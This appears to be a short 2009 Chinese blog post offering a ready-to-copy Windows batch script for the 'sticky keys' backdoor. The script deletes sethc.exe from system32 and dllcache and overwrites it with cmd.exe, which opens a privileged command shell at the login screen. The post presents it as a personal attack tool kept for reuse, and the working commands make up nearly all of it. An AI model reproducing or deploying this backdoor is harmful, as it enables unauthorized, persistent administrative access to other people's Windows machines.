2009年4月13日

Cmd粘滞键后门批处理

这个批处理手动写过太多遍了.....每次使用前都要写一遍,虽然简单,但写的有点烦了,所以也贴上来,以后直接copy.....

del /q /f %systemroot%\system32\dllcache\sethc.exe
del /q /f %systemroot%\system32\sethc.exe
copy /y %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
copy /y %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe

没有评论: